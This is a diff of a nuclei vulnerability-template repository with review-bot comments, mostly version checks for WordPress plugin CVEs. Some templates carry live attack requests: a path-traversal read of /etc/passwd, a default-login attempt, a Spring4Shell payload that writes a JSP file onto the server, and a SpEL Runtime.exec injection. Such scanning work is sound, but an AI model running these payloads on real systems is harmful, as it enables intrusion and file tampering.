@@ -0,0 +1,59 @@ +id: CVE-2024-6870 + +info: + name: > + Responsive Lightbox & Gallery <= 2.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via File Upload + author: topscoder + severity: low + description: > + The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping affecting the rl_upload_image AJAX endpoint. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4d55309-d178-4b3d-9de6-2cf2769b76fe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6870 + metadata: + fofa-query: "wp-content/plugins/responsive-lightbox/" + google-query: inurl:"/wp-content/plugins/responsive-lightbox/" + shodan-query: 'vuln:CVE-2024-6870' + tags: cve,wordpress,wp-plugin,responsive-lightbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml b/poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml new file mode 100644 index 0000000000..442d7d073b 
--- /dev/null +++ b/poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5 + +info: + name: > + WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wppfm_removeFeedFile' function in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7258 + metadata: + fofa-query: "wp-content/plugins/wp-product-feed-manager/" + google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/" + shodan-query: 'vuln:CVE-2024-7258' + tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-product-feed-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml b/poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml new file mode 100644 index 0000000000..5c5a9860fc --- /dev/null +++ b/poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069 + +info: + name: > + WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions + author: topscoder + severity: low + description: > + The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform various feed actions, such as deleting a feed, duplicating a feed, and changing the status of a feed. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7258 + metadata: + fofa-query: "wp-content/plugins/wp-product-feed-manager/" + google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/" + shodan-query: 'vuln:CVE-2024-7258' + tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-product-feed-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7384.yaml b/poc/cve/CVE-2024-7384.yaml new file mode 100644 index 0000000000..95f98b1286 --- /dev/null +++ b/poc/cve/CVE-2024-7384.yaml 
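Review bot: This template and the one at L131 both carry `cve-id: CVE-2024-7258` yet describe different weaknesses (arbitrary file deletion scored 8.8 versus unauthorized feed actions scored 4.3) and match the identical `<= 2.8.0` range, so one scan emits two contradictory findings for a single CVE. They originate from two distinct Wordfence records, so presumably one record's CVE mapping is wrong; verify against the CVE entry before keeping both, and until then the lower-scored one should drop `cve-id` and the `cve` tag and be identified by its record-specific id only.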
@@ -0,0 +1,59 @@ +id: CVE-2024-7384 + +info: + name: > + AcyMailing <= 9.7.2 - Authenticated (Subscriber+) Arbitrary File Upload via acym_extractArchive Function + author: topscoder + severity: low + description: > + The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the acym_extractArchive function in all versions up to, and including, 9.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2024-7384 + metadata: + fofa-query: "wp-content/plugins/acymailing/" + google-query: inurl:"/wp-content/plugins/acymailing/" + shodan-query: 'vuln:CVE-2024-7384' + tags: cve,wordpress,wp-plugin,acymailing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acymailing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acymailing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml b/poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml new file mode 100644 index 0000000000..2bb090c2c6 --- /dev/null 
+++ b/poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17 + +info: + name: > + File Manager Pro <= 8.3.7 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7559 + metadata: + fofa-query: "wp-content/plugins/wp-file-manager-pro/" + google-query: inurl:"/wp-content/plugins/wp-file-manager-pro/" + shodan-query: 'vuln:CVE-2024-7559' + tags: cve,wordpress,wp-plugin,wp-file-manager-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-file-manager-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-file-manager-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.3.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7778.yaml b/poc/cve/CVE-2024-7778.yaml new file mode 100644 index 0000000000..eaf0662ec8 --- /dev/null 
+++ b/poc/cve/CVE-2024-7778.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7778 + +info: + name: > + Orbit Fox by ThemeIsle <= 2.10.36 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.10.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/be83c6be-fb6c-462f-b54a-ca12d6d2581f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7778 + metadata: + fofa-query: "wp-content/plugins/themeisle-companion/" + google-query: inurl:"/wp-content/plugins/themeisle-companion/" + shodan-query: 'vuln:CVE-2024-7778' + tags: cve,wordpress,wp-plugin,themeisle-companion,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themeisle-companion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.10.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7836.yaml b/poc/cve/CVE-2024-7836.yaml new file mode 100644 index 0000000000..9141adda71 --- /dev/null +++ b/poc/cve/CVE-2024-7836.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7836 + +info: + name: > + Themify Builder <= 7.6.1 - Missing Authorization to Authenticated (Contributor+) Post Duplication + author: topscoder + severity: low + description: > + The Themify Builder plugin for WordPress is vulnerable to unauthorized post duplication due to missing checks on the duplicate_page_ajaxify function in all versions up to, and including, 7.6.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate and view private or draft posts created by other users that otherwise shouldn't be accessible to them. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/31dfc46c-a673-41f1-b701-aa832f004ebc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7836 + metadata: + fofa-query: "wp-content/plugins/themify-builder/" + google-query: inurl:"/wp-content/plugins/themify-builder/" + shodan-query: 'vuln:CVE-2024-7836' + tags: cve,wordpress,wp-plugin,themify-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themify-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themify-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.6.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7848.yaml b/poc/cve/CVE-2024-7848.yaml new file mode 100644 index 0000000000..9fc302a80c --- /dev/null +++ b/poc/cve/CVE-2024-7848.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7848 + +info: + name: > + User Private Files <= 2.1.0 - Insecure Direct Object Reference to Authenticated (Subscriber+) Private File Access + author: topscoder + severity: low + description: > + The User Private Files – WordPress File Sharing Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'dpk_upvf_update_doc' due to missing validation on the 'docid' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to gain access to other user's private files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fb06de8-97d6-46c3-83ef-93a209540259?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7848 + metadata: + fofa-query: "wp-content/plugins/user-private-files/" + google-query: inurl:"/wp-content/plugins/user-private-files/" + shodan-query: 'vuln:CVE-2024-7848' + tags: cve,wordpress,wp-plugin,user-private-files,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/user-private-files/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "user-private-files" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.0') \ No newline at end of file diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index e714f96cca..fda684a006 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml 
@@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 
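Review bot: The new `classification:` block carries only `cve-id: CVE-2008-5587`; the `cvss-metrics`, `cvss-score` and `cwe-id` fields that the sibling templates cve-2016-6210 and cve-2018-15473 in this same commit populate are absent, so the template's `severity: medium` stands unscored. In the collapsed text the added `tags: cve,cve2008,lfi,phppgadmin` follows `shodan-query` under `metadata:`; the view does not preserve indentation, but if the line is nested under `metadata` rather than at `info` level, tag-based selection will not see it, so that is worth confirming. Proposed addition under `classification:`: `cvss-metrics`, `cvss-score` and `cwe-id` lines filled from the CVE record.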
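Review bot: The line `tags: cve,cve2016,network,openssh` is removed in favour of `description:` and no `tags` line is re-added in either hunk of this file (the second hunk at L140 runs to end-of-file), so the template drops out of tag-based selection such as `cve` or `network` runs. The same removal with no visible replacement happens in cve-2018-15473 on L140 (`- tags: network,openssh,cve,cve2018`). Keep the tags alongside the new description, i.e. restore `tags: cve,cve2016,network,openssh` under `info:`.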
@@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index 2392e8714b..e2eabe600d 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml @@ -1,28 +1,28 @@ id: CVE-2018-15473 + info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-15473 cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 + + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: - type: regex regex: diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml index bc69c3ca6e..71a197e9fd 100644 --- a/poc/cve/cve-2021-44451.yaml +++ b/poc/cve/cve-2021-44451.yaml @@ -1,5 +1,4 @@ id: CVE-2021-44451 - info: name: Apache Superset Default Login author: dhiyaneshDK 
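Review bot: In the cve-2018-15473 hunk the four-entry `reference` list, which included the upstream fix commit and the Debian and oss-security entries, is collapsed to the single NVD URL, and `cvss-score: 5.3` becomes `5.30`; YAML reads both as the same number, so the second change is pure diff noise, and the first discards the most useful triage links. Neither change improves the template, so the original list and `cvss-score: 5.3` should be kept. The template file continues past the end of this hunk, so the extractor regex it ends on is not fully visible here.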
@@ -12,14 +11,12 @@ info: tags: apache, default-login classification: cve-id: CVE-2021-44451 - requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -28,14 +25,12 @@ requests: Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} - attack: pitchfork payloads: username: - admin password: - admin - extractors: - type: regex name: csrf_token @@ -44,7 +39,6 @@ requests: internal: true regex: - 'value="(.*?)">' - matchers-condition: and matchers: - type: word @@ -54,12 +48,10 @@ requests: - 'Redirecting...' - '

Redirecting...' - - type: word part: header words: - 'session' - - type: status status: - 302 diff --git a/poc/cve/cve-2022-22965.yaml b/poc/cve/cve-2022-22965.yaml index 84009f6f85..e6922c3d24 100644 --- a/poc/cve/cve-2022-22965.yaml +++ b/poc/cve/cve-2022-22965.yaml 
@@ -1,51 +1,36 @@ id: CVE-2022-22965 info: - name: Spring Framework - Remote Code Execution - author: justmumu,arall,dhiyaneshDK,akincibor + name: CVE-2022-22965 - Spring4Shell RCE Vulnerability + author: justmumu + description: CVE-2022-22965 - Spring Core Remote Code Execution Vulnerability severity: critical - description: A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. - reference: - - https://tanzu.vmware.com/security/cve-2022-22965 - - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/ - - https://twitter.com/RandoriAttack/status/1509298490106593283 - - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw - - https://twitter.com/_0xf4n9x_/status/1509935429365100546 - - https://nvd.nist.gov/vuln/detail/cve-2022-22965 - remediation: 5.3.x users should upgrade to 5.3.18+, 5.2.x users should upgrade to 5.2.20+. 
+ tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22965 - cwe-id: CWE-94 - tags: cve,cve2022,rce,spring,injection,oast,intrusive + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22965 + cwe-id: CWE-770 requests: - - method: GET - path: - - "{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx" - - method: POST path: - "{{BaseURL}}" - + redirects: false headers: + suffix: "%>" + c2: "<%" Content-Type: application/x-www-form-urlencoded + body: class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out.println(new%20String(%22Falcon%20Punch!%22))%3B%20%7D%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=AAAAAAAAAAAAAAA&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= - body: | - class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx + - method: GET + path: + - "{{RootURL}}/AAAAAAAAAAAAAAA.jsp" + headers: + 01: "{{wait_for(5)}}" - matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: word - part: interactsh_request - words: - - "User-Agent: Java" - case-insensitive: true - -# Enhanced by mp on 2022/05/19 + - type: dsl + dsl: + - "status_code==200 && contains(body, 'Falcon Punch!')" + \ No newline at end of file 
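Review bot: The rewritten check is state-changing — the POST reconfigures the Tomcat access-log valve to write `AAAAAAAAAAAAAAA.jsp` into `webapps/ROOT` and the second request fetches it — yet the new `tags:` line drops `intrusive` (and `oast`), so operators who exclude intrusive templates will now run one that leaves a JSP file and an altered logging pipeline on the target. The metadata regresses as well: `cwe-id` moves from `CWE-94` to `CWE-770` (resource exhaustion, which does not describe data-binding code injection), `cvss-metrics` drops from `CVSS:3.1` to `CVSS:3.0`, and the six references plus the `remediation: 5.3.x users should upgrade to 5.3.18+, 5.2.x users should upgrade to 5.2.20+.` line are deleted. Restore `tags: cve,cve2022,rce,spring,injection,intrusive`, keep `cwe-id: CWE-94`, and keep the remediation and reference entries; a short comment stating that the written `.jsp` must be removed after a positive result would help whoever runs this.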
diff --git a/poc/cve/springForShell-CVE-2022-22963.yaml b/poc/cve/springForShell-CVE-2022-22963.yaml index d04177443d..f28360d6a7 100644 --- a/poc/cve/springForShell-CVE-2022-22963.yaml +++ b/poc/cve/springForShell-CVE-2022-22963.yaml 
@@ -1,46 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: cve,cve2022,springcloud,rce + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - 
"{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/05/19 + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/fuzz/log4j-fuzz2.yaml b/poc/fuzz/log4j-fuzz2.yaml index 70414c34c9..a633a9bdb1 100644 --- a/poc/fuzz/log4j-fuzz2.yaml +++ b/poc/fuzz/log4j-fuzz2.yaml @@ -12,6 +12,7 @@ http: GET / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} + - | POST / HTTP/1.1 Host: {{Hostname}} 
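Review bot: The new matchers at the end of the hunk (`part: body` containing `functionRouter` and `status: 500`) match any Spring error page that echoes the request path with a 500, so the rewritten template will report targets that merely fail on `/functionRouter`, whereas the removed version required an out-of-band interaction to confirm; results from this template need manual confirmation and the `description:` should say so. The metadata regresses too: the accurate description and six references are replaced by `description: RCE on Spring cloud function SPEL`, `cwe-id` changes from `CWE-94` to `CWE-770` (resource exhaustion, wrong for SpEL injection), and `cvss-metrics` drops from 3.1 to 3.0 — keep the original `description`, `reference` list and `cwe-id: CWE-94`. The identical change is applied to the duplicate copy at poc/java/springForShell-CVE-2022-22963.yaml further down; the two files should be deduplicated rather than edited in parallel.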
